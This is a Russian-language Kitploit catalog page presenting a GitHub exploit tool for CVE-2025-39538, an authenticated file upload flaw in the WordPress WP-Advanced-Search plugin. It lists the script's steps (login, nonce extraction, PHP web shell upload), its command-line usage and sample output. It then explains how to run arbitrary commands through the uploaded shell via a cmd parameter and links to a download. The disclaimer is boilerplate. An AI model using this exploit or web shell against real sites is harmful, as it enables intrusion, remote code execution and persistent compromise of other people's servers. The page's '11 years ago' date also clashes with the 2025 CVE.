Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-39538 — WordPress WP-Advanced-Search <= 3.3.9.3 - Уязвимость произвольной загрузки файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-39538
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-39538

CVE-2025-39538

WordPress WP-Advanced-Search <= 3.3.9.3 - Уязвимость произвольной загрузки файлов

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛡️ CVE-2025-39538 - WordPress WP-Advanced-Search <= 3.3.9.3 Произвольная загрузка файлов

CVE-2025-39538
Опубликовано: 2025-04-16
Тип уязвимости: Произвольная загрузка файлов (неограниченная загрузка файла опасного типа)
Затронутый плагин: WP-Advanced-Search от Mathieu Chartier
Затронутые версии: Все версии до 3.3.9.3 включительно

Эта уязвимость позволяет аутентифицированному атакующему загрузить вредоносный PHP-файл (например, веб-шелл) на сервер, используя функцию импорта, предоставляемую плагином. Загруженный файл помещается в каталог загрузок WordPress и может привести к удаленному выполнению кода.

🧱 Путь загрузки:

root@kitploit:~
wp-content/uploads/2025/04/

⚙️ О скрипте эксплойта

Этот скрипт на Python выполняет следующие действия:

  1. Выполняет вход на сайт WordPress с использованием предоставленных учетных данных.
  2. Извлекает требуемый wp_advanced_search_up_nonce со страницы администрирования импорта/экспорта.
  3. Загружает веб-шелл (PHP-файл) через специально сформированный POST-запрос.

🚀 Использование

root@kitploit:~
usage: a.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://127.0.0.1/wordpress)
  -un, --username USERNAME
                        WordPress Username
  -p, --password PASSWORD
                        WordPress Password

🖥️ Пример вывода:

root@kitploit:~
[*] Попытка входа...
[+] Вход выполнен успешно.
[*] Получение nonce со страницы импорта/экспорта...
[+] Nonce извлечен: 2140855687
[*] Попытка загрузить шелл...
[+] Файл загружен (проверьте wp-content/uploads или временный каталог).

🐚 Использование загруженного шелла

После загрузки вы можете получить доступ к вашему шеллу следующим образом:

root@kitploit:~
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami

Замените whoami на любую команду Linux, которую хотите выполнить, например:

  • id — показывает идентификатор текущего пользователя.
  • pwd — показывает текущий каталог.
  • ls — выводит список файлов.

⚠️ Отказ от ответственности


Этот инструмент предназначен только для образовательного и авторизованного тестирования безопасности.
Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим скриптом.


Автор: Nxploited | Khaled Alenazi

Скачать инструмент